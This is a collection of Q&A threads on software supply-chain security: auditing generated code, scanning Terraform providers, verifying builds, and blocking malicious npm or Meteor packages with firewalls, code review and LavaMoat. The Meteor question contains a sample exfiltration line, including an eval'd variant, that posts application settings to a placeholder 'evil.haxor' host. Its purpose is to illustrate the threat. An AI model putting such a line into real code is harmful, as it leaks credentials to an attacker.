Project created using JHipster is available to everyone? - jhipster

Hello folks i am newbie i wanted to know suppose i am creating a web application using JHipster. Will my code available to everyone?.
I mean will the code be submitted to open source community?

The generated code belongs to you, it's not shared.
Now, if you're afraid of your code leaking out because you're working in a highly secured domain (e.g. Finance), it's another story.
The generator is open source so you can audit what it does.
But it would be simpler to configure your firewall so that it blocks outgoing traffic while still allowing incoming traffic. Generator should require only getting artifacts from public repositories (npm, maven) during generation phase.
It's like using a compiler, how do you know that it does not upload your source code somewhere? Either you audit the compiler code or you protect yourself with a firewall specifically configured each time you use it.
Finally, you should evaluate the risk of leaking generated code which has usually little value in comparison with the code that you manual add which is where business value is.

Related

Terraform providers vulnerability detection

Using a lot of (official and non official) terraform providers, I'm looking for a tool to perform security analysis on terraform providers before executing terraform plan/apply commands (and so executing providers code). I want to prevent malicious code from providers to be executed blindly.
I'm basically executing terraform providers mirror command to save local copies of required providers and I'm wondering if I can security scan that result.
I tested kics, checkov and tfsec but they are all looking for security issues in my terraform static code but not in providers.
Do you have any good advices regarding this topic ?
This is actually quite a good question. There are many other problems that can be reduced to same generic question - how to make sure that the thing you downloaded from the internet does not do anything malicious to you like e.g.:
How to make sure that a minecraft plugin does not hack you?
How to make sure that a spring boot dependency does not hack you?
How to make sure that a library xxx you attach to your project does not do harm to you?
Should you use docker image yyy in your project?
Truth is: everything you use has the potential to explode right in your face (or more correctly: right into the face of the system owner). That's why the system owner (usually a company) defines a set of rules to follow what is allowed and what is not allowed. No set of rules you are aware of? Below a set of rules we came up with ourselves when thinking about on-boarding a new library for some projects to use:
Do not take random stuff from github. Take only products with longer history, small bug backlog, little to none past issues in the CVE list, actively maintained.
Do static code analysis yourself. Sometimes it is possible to have tools that work on binaries level do that for you. Sometimes you can do it on source level only. In case of Java libraries, check what tools like Dependency Track think about the library and version you are about to use.
Run the code and see how it works: what does it write, what does it read, what URLs does it communicate with (do a TCP dump if necessary).
Document everything you have done somewhere.
This gives you no 100% confidence that things will not go terribly wrong. But this is a systematic approach that will reduce the risk of doing something stupid.

Can a running nodejs application cryptographically prove it is the same as published source code version?

Can a running nodejs program cryptographically prove that it is the same as a published source code version in a way that could not be tampered with?
Said another way, is there a way to ensure that the commands/code executed by a nodejs program are all and only the commands and code specified in a publicly disclosed repository?
The motivation for this question is the following: In an age of highly sophisticated hackers as well as pressures from government agencies for "backdoors" that allow them to snoop on private transactions and exchanges, can we ensure that an application has been neither been hacked nor had a backdoor added?
As an example, consider an open source-based nodejs application like lesspass (lesspass/lesspass on github) which is used to manage passwords and available for use here (https://lesspass.com/#/).
Or an alternative program for a similar purpose encryptr (SpiderOak/Encryptr on github) with its downloadable version (https://spideroak.com/solutions/encryptr).
Is there a way to ensure that the versions available on their sites to download/use/install are running exactly the same code as is presented in the open source code?
Even if we have 100% faith in the integrity of the the teams behind applications like these, how can we be sure they have not been coerced by anyone to alter the running/downloadable version of their program to create a backdoor for example?
Thank you for your help with this important issue.
sadly no.
simple as that.
the long version:
you are dealing with the outputs of a program, and want to ensure that the output is generated by a specific version of one specific program
lets check a few things:
can an attacker predict the outputs of said program?
if we are talking about open source programs, yes, an attacker can predict what you are expecting to see and even can reproduce all underlying crypto checks against the original source code, or against all internal states of said program
imagine running the program inside a virtual machine with full debugging support like firing up events at certain points in code, directly reading memory to extract cryptographic keys and so on. the attacker does not even have to modify the program, to be able to keep copys of everything you do in plaintext
so ... even if you could cryptographically make sure that the code itself was not tampered with, it would be worth nothing: the environment itself could be designed to do something harmful, and as Maarten Bodewes wrote: in the end you need to trust something.
one could argue that TPM could solve this but i'm afraid of the world that leads to: in the end ... you still have to trust something like a manufacturer or worse a public office signing keys for TPMs ... and as we know those would never... you hear? ... never have other intentions than what's good for you ... so basically you wouldn't win anything with a centralized TPM based infrastructure
You can do this cryptographically by having a runtime that checks signatures before running any code. Of course, you'd have to trust that runtime environment as well. Unless you have such an environment you're out of luck - that is, unless you do a full code review.
Furthermore you can sign the build by placing a signature within the build system. The build system and developer access in turn can be audited. This is usually how secure development environments are build. But in the end you need to trust something.
If you're just afraid that a particular download is corrupted you can test against an official hash published at one or more trusted locations.

How to identify vulnerable code in an IoT node?

As part of an on-going project of mine, my task is to identify instructions in a code which are vulnerable to tampering.
The code would be running on an IoT device. And the identification of instructions can be from either the source code or just the executable(with no source code).
Does anyone know about some tools or techniques?
In a nutshell, how to automatically locate security-sensitive code?
EDIT: I believe now I have come to understand my task better. I do not have to use a tool to protect but devise a technique of my own to protect my code statements( written in C Language) which are vulnerable. Especially Anti-debugging statements.
Are there any heuristics to find out the vulnerable statements in the code. like authentication points and Anti-Debugging checks?
The fact that the software runs on a device is not different than software running on a web server or local/cloud computer.
What you might want to do is look at all the individual components in your setup that might expose a vulnerability.
The image below is a representation that I often use for describing a connected product from the highest level.
It contains:
The device (often running C or C++ code)
The connection to the cloud (like, https or a messaging service)
The API to the cloud (often a RESTful API)
The software on the cloud itself
You can go through these ones by one and identify what might be wrong. As a rule of thumb, you can always try to find the spot where an outside connection is made.
Following those four steps
Check if the code can be tempered with before an outside connection is made. If your code is compiled and makes an outside connection, try to find an alternative that you can validate.
Check certificates, messaging protocols etc. Makes sure all connections are following safety standards.
Make sure your API follows proper RESTful security measures.
Validate the software in the cloud, check certificates and use something like OATH.
Last, check services like https://www.checkmarx.com/

How can I prevent 3rd-party packages from having direct access to Meteor.settings?

I've tested, and the two things are allowed in 3rd party pacakges:
Meteor.settings.foo = "foobar" # why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") # nooooo
I want to be able to protect my settings from 3rd parties.
Scenario:
I have sensitive data in my Meteor.settings file, especially in production, because that is the current best-practice place to put them.
I use a 3rd party meteor package such as iron:router, but possibly one by a lesser known author.
One of the 3rd party packages looks up my Meteor.settings and does an HTTP post on which some of my settings are sent along.
HTTP.post('http://evil.haxor', Meteor.settings) # all ur settings
Boom. Instantly I've leaked my production credentials, my payment gateway, Amazon, or whatever. Worse, as far as I know, the code that steals my settings might be loaded in and eval'd so I don't even see the string "Meteor.settings" in the source of the package.
I've tested, and the two things are allowed in 3rd party pacakges:
Meteor.settings.foo = "foobar" # why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") # nooooo
I'm amenable to hacky solutions. I know the Meteor team might not address this right away, given all on their plates (Windows support, a non-Mongo DB).. I just want to be able to provide this level of security to my company, for whom I think it would concern their auditors to discover this level of openness. Otherwise I fear I'm stuck manually security auditing every package I use.
Thank you for your consideration!
Edit: I see now that the risk of a package seeing/stealing the settings is essentially the same problem as any package reading (or writing) your filesystem. And the best way to address that would be to encrypt. That's a valid proposal, which I can use immediately. However, I think there could, and should be notions of 'package-scoped' settings. Also, the dialogue with commenters made me realize that the other issue, the issue of settings being (easily) modifiable at runtime, could be addressed via making the settings object read-only, using ES5 properties.
A malicious npm package can come with native code extensions, access the filesystem directly, and in general do anything the rest of the code in the app can do.
I see 2 (partial) solutions:
set up a firewall with outbound rules and logging. Unfortunately if your application communicates with any sort of social network (facebook, twitter) then the firewall idea will not handle malware that uses twitter as a way to transmit data. But maybe it would help?
lock down the DNS resolution, provide a whitelist of DNS lookups. This way you could spot if the app starts trying to communicate with 'evil.haxor'
There are other more advanced detectors - but at some point a hacker is going to go after the other services running on the box and not try for modifying your code.
Good luck. And its good to be paranoid -- because they really are out to get you.

How to prevent malicious *.js scripts from executing in Node.js

I'm using Node.js to create the web service. In the implementation, I consumed many third party modules which are installed via npm. There is security issue if there is malicious *.js scripts in the consumed modules. For example, the malicious code may delete all my disk files, or collect the secret data in silence.
I have a couple of questions regarding this.
How to detect if there is security issue in the module?
What should I do to prevent malicious *.js scripts from executing in Node.js?
I'm very appreciate if you can share any experience to build the node.js service.
Thanks,
Jeffrey
One concern you did not raise is that a module might try to make a direct connection to your database itself, or to other services on your internal network. This might be prevented by setting passwords which the module cannot find so easily.
1. Restricting disk access
This project was presented at NodeConf last year. It attempts to restrict filesystem access in precisely the situation you describe.
https://github.com/yahoo/fs-lock
"The goal for this module is to help when you are loading 3rd party modules and you need to restrict their access."
It sounds rather like the proposal Jeffrey made in the comments in Plato's answer.
(If you want to look further into hooking OS calls, this hookit project may present a few ideas. Although in its current form it only wraps the callback function, it might provide inspiration of what to hook, and how. Here is an example of it being used.)
2. Analyse flow of sensitive data
If you are only worried about data-stealing (not filesystem or database access), then you can focus your concerns:
You should be most concerned about those packages which are being passed sensitive data. Presumably some of the data on your web-service is presented to the public anyway!
Most packages will not have access to the full stack of your application, only the bits of data you pass them. If a package is only being passed a small amount of sensitive data, and never passed the rest of the data, it may not be able to do anything malicious with the data it receives. (For example, if you pass all your usernames to one package for processing and all your addresses to a different package, that is a much smaller concern than if you pass all your usernames, addresses and credit-card numbers to the same package!)
Identify the sensitive data in your app, and note which functions in which modules they are passed to.
3. Perform efficient code review
You may not need to go to Github to read the code. The great majority of packages provide all their source-code in their install folder inside node_modules. (There are a few packages which provide binaries however; these are naturally harder to verify.)
If you do want to check the code yourself, there may ways to reduce the amount of work involved:
To secure your own app, you do not need to read the entire source code of all packages in your project. You only need to review those functions which are actually called.
You may trace the code by reading it, or with the aid of a text-based debugger, or a GUI debugger. (Of course you should look out for branching, where different inputs may cause different parts of the module to be called.)
Set breakpoints when you call into a module which you don't trust, so you can step through the code that is called and see what it does. You may be able to conclude that only a small part of the module is used, so only that code needs to be verified.
Whilst tracing flow should cover concerns about sensitive data at runtime, to check for file access or database access, we should also look at the initialisation code of each module which is required, and all calls (including requires) which are made from there.
4. Other measures
It might be wise to lock the version number of each package in package.json so that you don't accidentally install a new version of a package until you decide that you need to.
You may use social factors to build confidence in a package. Check the respectability of the author. Who is he, and who does he work for? Do the author and his employers have a reputation to uphold? Similarly, who uses his project? If the package is very popular, and used by industry giants, it is likely that others have already reviewed the code.
You may wish to visit github and enable notifications for all the top-level modules you are using, by "watching" the repository. This will inform you if any vulnerabilities are reported in the package in future.
Most (all?) modules have source code available on Github, you can read through the source and look for security problems, or hire a security professional to do the job.
I just take the risk - although I tend to use popular packages with hundreds of commits, active maintenence, and issue lists.
If your project dependency tree is large enough, reviewing all of your dependencies is not a feasible long-term strategy.
The original answer from Joey has some good countermeasures you can use for specific scenarios. I've also seen https://github.com/berstend/node-safe - could make you slightly safer on mac.
A general solution to the problem is taking shape though.
How to protect a project from malicious packages
make sure you don't run lifecycle (postinstall) scripts unless they're known and necessary (see my talk on this topic)
put 3rdparty code in a compartment, lock down the environment, decide on which powerful APIs to pass to each package.
The second step requires the use of Compartment, which is a work-in-progress in TC39 https://github.com/tc39/proposal-compartments/
But a shim exists. And Some tooling was built on top of that shim.
You could use the SES-shim directly and implement your own controls, or use the convenience of LavaMoat
LavaMoat lets you generate and tweak a per-package policy where you can decide which globals and builtins it should have access to.
LavaMoat also offers a tool to manage install scripts.
Here's my talk on SES and LavaMoat with a demo at the end.
How to set up LavaMoat
See LavaMoat docs for more details
disable/allow dependency lifecycle scripts (eg. "postinstall") via #lavamoat/allow-scripts
npm i --ignore-scripts -D #lavamoat/allow-scripts
npx --no-install allow-scripts setup
npx --no-install allow-scripts auto
then, edit the allow-list in package.json
after every insstall/reinstall run allow-scripts
run your server or build process in lavamoat-node
npm i -D lavamoat
in your package.json add something like:
"scripts": {
"lavamoat-policy": "lavamoat app.js --autopolicy",
"start": "lavamoat app.js"
run lavamoat-policy every time you make changes to your dependency tree and review the policy (see also: policy override)
run npm start to start your app
Disclaimer: I contribute to LavaMoat and Endo. They are Open Source projects on permissive licenses.

Resources